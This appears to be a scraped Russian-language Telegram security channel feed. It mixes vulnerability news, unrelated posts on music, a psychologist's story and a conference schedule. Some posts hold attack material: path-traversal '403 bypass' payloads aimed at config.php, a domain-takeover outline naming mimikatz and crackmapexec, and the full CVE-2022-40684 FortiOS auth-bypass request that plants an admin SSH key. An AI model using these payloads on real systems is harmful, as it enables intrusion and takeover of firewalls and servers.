💥BBBB-Breaking News!!!
0days in Microsoft Exchange Server
Post-auth RCE!
Keep yourass server closed from the Internet!
https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
0days in Microsoft Exchange Server
Post-auth RCE!
Keep your
https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
Devious Methods
💥BBBB-Breaking News!!! 0days in Microsoft Exchange Server Post-auth RCE! Keep your ass server closed from the Internet! https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
GitHub
GitHub - VNCERT-CC/0dayex-checker: Zeroday Microsoft Exchange Server checker (Virtual Patching checker)
Zeroday Microsoft Exchange Server checker (Virtual Patching checker) - VNCERT-CC/0dayex-checker
👍1
Forwarded from Психолог Бондин (Евгений Бондин |Психолог КПТ)
Курт, Алжир и Сострадание
Один из самых больших страхов при внезапном переезде - страх неизвестного.
Мы боимся, что даже базовые потребности не будут удовлетворены - еда, вода, жильё, сон.
Истина в том, что по всему земному шару есть сострадательные люди.
В каждом обществе - азиатском или европейском, африканском или южно-американском есть место состраданию.
В Казахстане открыл для себя курт - это сухой кисломолочный продукт, похож на сухой-сухой сыр.
Если вы тоже в Кз, попробуйте с чаем или арбузом - очень вкусно
В Карагандинской области в сталинские времена располагался А.Л.Ж.И.Р. - женский концлагерь.
Когда его строили, у местных казахов отняли много земли и большую часть скота «для нужд» лагеря.
Когда колонны узниц шли мимо местных, взрослые и дети бросали камни в пленников.
Охранники, видя это, не вмешивались.
Им было невдомек, что белые камни, которые малограмотные крестьяне и дети бросали в женщин были на самом деле куртом, который узницы потом подбирали и тем самым спасались от голодной смерти.
В любые темные времена есть те, кто кричит «Вон из страны, вы отбираете наши места!», но есть и те, кто организовывает залы для ночлега, готовы пускать жить бесплатно и помогают едой, водой и жильем .
Вторых видно и слышно меньше, но из подвиг не умалить.
Спасибо всем казахстанцам, армянам, грузинам и другим народностям, кто в трудные минуты демонстрирует лучшие свои человеческие черты.
Один из самых больших страхов при внезапном переезде - страх неизвестного.
Мы боимся, что даже базовые потребности не будут удовлетворены - еда, вода, жильё, сон.
Истина в том, что по всему земному шару есть сострадательные люди.
В каждом обществе - азиатском или европейском, африканском или южно-американском есть место состраданию.
В Казахстане открыл для себя курт - это сухой кисломолочный продукт, похож на сухой-сухой сыр.
Если вы тоже в Кз, попробуйте с чаем или арбузом - очень вкусно
В Карагандинской области в сталинские времена располагался А.Л.Ж.И.Р. - женский концлагерь.
Когда его строили, у местных казахов отняли много земли и большую часть скота «для нужд» лагеря.
Когда колонны узниц шли мимо местных, взрослые и дети бросали камни в пленников.
Охранники, видя это, не вмешивались.
Им было невдомек, что белые камни, которые малограмотные крестьяне и дети бросали в женщин были на самом деле куртом, который узницы потом подбирали и тем самым спасались от голодной смерти.
В любые темные времена есть те, кто кричит «Вон из страны, вы отбираете наши места!», но есть и те, кто организовывает залы для ночлега, готовы пускать жить бесплатно и помогают едой, водой и жильем .
Вторых видно и слышно меньше, но из подвиг не умалить.
Спасибо всем казахстанцам, армянам, грузинам и другим народностям, кто в трудные минуты демонстрирует лучшие свои человеческие черты.
👍5
Forwarded from Поросёнок Пётр
Тут недавно чуваки на Hackerone обнесли программу Opensea на 615,000$ за последние 90 дней. Основными участниками похеков были cdl и renekroka. И да, там за один крит выдают 100к$.
К слову renekroka в твиттере светанул сколько они вынесли за последнее время с корешем, и обещал сделать райтап. И вот кажется мне самое время подтянуть знания в этой области и зачекать эту презу. Выглядит интересно.
https://youtu.be/ie5kmTHaeN8
К слову renekroka в твиттере светанул сколько они вынесли за последнее время с корешем, и обещал сделать райтап. И вот кажется мне самое время подтянуть знания в этой области и зачекать эту презу. Выглядит интересно.
https://youtu.be/ie5kmTHaeN8
YouTube
#HITB2022SIN Breaking Web3: Exploitation Techniques For Cryptocurrency Hacking - David Pethes
In my previous presentations I have spoken about bridge vulnerabilities and how to exploit them by simple tools. This was an introduction to the core concepts of cryptocurrency hacking in a system where web2 and web3 are combined. This talk goes further into…
🔥1
New 403 Bypass 🔥🔥🔥🔥
pr0xy.cc/bsides.pdf
Unicode Encoding
Try:
⨀
⊡
Download.php?file=.⨀/config.php
Download.php?file=⊡⨀/config.php
Download.php?file=⊡./config.phppr0xy.cc/bsides.pdf
Forwarded from SecAtor
Fortinet в частном порядке предупредила клиентов об уязвимости в системе безопасности, затрагивающей брандмауэры FortiGate и веб-прокси FortiProxy.
Критическая уязвимость CVE-2022-40684 имеет оценку CVSS 9,6 и связана с уязвимостью обхода аутентификации, которая может позволить злоумышленнику, не прошедшему проверку подлинности, выполнять произвольные операции в административном интерфейсе с помощью специально созданных запросов HTTP или HTTPS.
Ошибка затрагивает следующие версии FortiOS с 7.0.0 до 7.0.6 и с 7.2.0 до 7.2.1, FortiProxy с 7.0.0 на 7.0.6 и 7.2.0. Fortinet откладывает публичное раскрытие уязвимости и подробности атак с ее использованием до тех пор, пока ее клиенты не применят исправления.
Проблема исправлена в FortiOS 7.0.7 и 7.2.2, а также в версиях FortiProxy 7.0.7 и 7.2.1.
Принимая во внимание возможность удаленной эксплуатации этой проблемы и доступность, согласно поиску Shodan, более 100 000 брандмауэров FortiGate в сети, Fortinet настоятельно рекомендует всем клиентам с уязвимыми версиями выполнить немедленное обновление.
В качестве временного обходного пути Fortinet рекомендует пользователям отключить администрирование HTTPS с выходом в Интернет до тех пор, пока не будут установлены обновления, или, в качестве альтернативы, ограничить IP-адреса, которые могут получить доступ к административному интерфейсу с помощью локальной политики.
Критическая уязвимость CVE-2022-40684 имеет оценку CVSS 9,6 и связана с уязвимостью обхода аутентификации, которая может позволить злоумышленнику, не прошедшему проверку подлинности, выполнять произвольные операции в административном интерфейсе с помощью специально созданных запросов HTTP или HTTPS.
Ошибка затрагивает следующие версии FortiOS с 7.0.0 до 7.0.6 и с 7.2.0 до 7.2.1, FortiProxy с 7.0.0 на 7.0.6 и 7.2.0. Fortinet откладывает публичное раскрытие уязвимости и подробности атак с ее использованием до тех пор, пока ее клиенты не применят исправления.
Проблема исправлена в FortiOS 7.0.7 и 7.2.2, а также в версиях FortiProxy 7.0.7 и 7.2.1.
Принимая во внимание возможность удаленной эксплуатации этой проблемы и доступность, согласно поиску Shodan, более 100 000 брандмауэров FortiGate в сети, Fortinet настоятельно рекомендует всем клиентам с уязвимыми версиями выполнить немедленное обновление.
В качестве временного обходного пути Fortinet рекомендует пользователям отключить администрирование HTTPS с выходом в Интернет до тех пор, пока не будут установлены обновления, или, в качестве альтернативы, ограничить IP-адреса, которые могут получить доступ к административному интерфейсу с помощью локальной политики.
The Ultimate old skool Drum and Bass 1992-1995.mp4
80.3 MB
🎶 ULTIMATE OLD SKOOL D&B 1992-1995 💥
Track Listing with Start/End Times:
Spiritual Aura - Engineers Without Fears
0:00:00 - 0:05:31
Breakage#4 - Noise Factory
0:03:29 - 0:08:15
Thunder (Original Mix) - The Rood Project
0:06:56 - 0:11:37
We Enter (Heavenly Remix) - Aladdin
0:10:48 - 0:17:22
The VIP (Final Chapter) - DJ Taktix
0:16:31 - 0:22:43
So Good (Heavy Mix) - Aladdin
0:21:16 - 0:26:56
A London Sumtin' (Tek 9 Remix) - Code 071
0:26:09 - 0:31:02
Session One (Riots in Rayleigh) - Sonz Of A Loop Da Loop Era
0:29:54 - 0:36:22
Summer Breeze - Tek 9
0:35:08 - 0:39:41
The Mutant Remix - Rollers Instinct (Remix By DJ Trace) - T Power & The Sandman
0:38:28 - 0:44:49
Rollidge (Bonus Track) - DJ SS
0:42:34 - 0:49:51
Oh Gosh! - Undercover Agent
0:49:27 - 0:54:19
Being With You - Foul Play
0:52:44 - 0:59:18
Beats Track - Foul Play
0:56:26 - 1:03:24
Renegade Snares (Foul Play VIP Mix) - Omni Trio
1:02:58 - 1:08:20
Music Is The Key - Foul Play
1:07:55 - 1:12:53
Track Listing with Start/End Times:
Spiritual Aura - Engineers Without Fears
0:00:00 - 0:05:31
Breakage#4 - Noise Factory
0:03:29 - 0:08:15
Thunder (Original Mix) - The Rood Project
0:06:56 - 0:11:37
We Enter (Heavenly Remix) - Aladdin
0:10:48 - 0:17:22
The VIP (Final Chapter) - DJ Taktix
0:16:31 - 0:22:43
So Good (Heavy Mix) - Aladdin
0:21:16 - 0:26:56
A London Sumtin' (Tek 9 Remix) - Code 071
0:26:09 - 0:31:02
Session One (Riots in Rayleigh) - Sonz Of A Loop Da Loop Era
0:29:54 - 0:36:22
Summer Breeze - Tek 9
0:35:08 - 0:39:41
The Mutant Remix - Rollers Instinct (Remix By DJ Trace) - T Power & The Sandman
0:38:28 - 0:44:49
Rollidge (Bonus Track) - DJ SS
0:42:34 - 0:49:51
Oh Gosh! - Undercover Agent
0:49:27 - 0:54:19
Being With You - Foul Play
0:52:44 - 0:59:18
Beats Track - Foul Play
0:56:26 - 1:03:24
Renegade Snares (Foul Play VIP Mix) - Omni Trio
1:02:58 - 1:08:20
Music Is The Key - Foul Play
1:07:55 - 1:12:53
❤1
🇹🇷 Как один турок, домен ломал…
Если вкратце, то пробив был через RCE в Dameware Mini Remote Control.
Nessus сканер легко эту уязвимость определяет на порту 6291/tcp
Далее берем модифицированный PoC и исполняем команду, а там уже дело техники: mimikatz, bloodhound, crackmapexec…
https://bariskoparmal-com.translate.goog/2021/02/01/domain-admine-uzanan-yolculuk/?_x_tr_sl=tr&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=sc
Если вкратце, то пробив был через RCE в Dameware Mini Remote Control.
Nessus сканер легко эту уязвимость определяет на порту 6291/tcp
Далее берем модифицированный PoC и исполняем команду, а там уже дело техники: mimikatz, bloodhound, crackmapexec…
https://bariskoparmal-com.translate.goog/2021/02/01/domain-admine-uzanan-yolculuk/?_x_tr_sl=tr&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=sc
Barış Koparmal
Domain Admin’e Uzanan Yolculuk
Kariyerimde benim için özel yere sahip olan ve türlü ekşınlar içeren yeni yazımdan herkese merhaba! Bu yazımda, stajyerlikten sonra siber güvenlik uzmanı ünvanına sahip olduğum ilk günümde takım li…
⚡️В metasploit framework завезли поддержку BOF (Beacon Object File). Пока работает только в сессии WIndows meterpreter.
https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
Official doc page
https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
Official doc page
Rapid7
Metasploit Weekly Wrap-Up: Oct. 7, 2022 | Rapid7 Blog
This week brings a new feature to the Windows Meterpreter, the Beacon Object File loader. Learn more about this weeks updates!
S02E40
VISION Radio
VISION Radio this week has our man of the moment, Icicle on hosting duties! We listen to the full ‘Post’ album plus some of the songs that inspired his ideas behind the music. You can find an in-depth interview with Jeroen on our Patreon. Enjoy!
#DNB #Icicle #Noisia
#DNB #Icicle #Noisia
🔥2
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Анонс всех докладов на завтра (14 Октября)
До дня Х осталось меньше суток, завтра по плану будет:
— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн
План может меняться, уж не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.
☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io
Всем Peace ✌️
До дня Х осталось меньше суток, завтра по плану будет:
— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн
План может меняться, уж не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.
☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io
Всем Peace ✌️
👍3
Forwarded from Private Shizo
exploit.py
1.9 KB
🔥🔥🔥CVE-2022-40684 - Auth bypass extract admin users and LDAP config - This PoC do only read-only actions.
how to use exploit?
how to use exploit?
python3 exploit.py targetSite
SecAtor
Fortinet в частном порядке предупредила клиентов об уязвимости в системе безопасности, затрагивающей брандмауэры FortiGate и веб-прокси FortiProxy. Критическая уязвимость CVE-2022-40684 имеет оценку CVSS 9,6 и связана с уязвимостью обхода аутентификации,…
вот и рабочий эксплоит 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
Proof of Concept for FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)
💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
https://github.com/horizon3ai/CVE-2022-40684
💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\”” }https://github.com/horizon3ai/CVE-2022-40684
GitHub
GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and …
A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager - horizon3ai/CVE-2022-40684
🔥1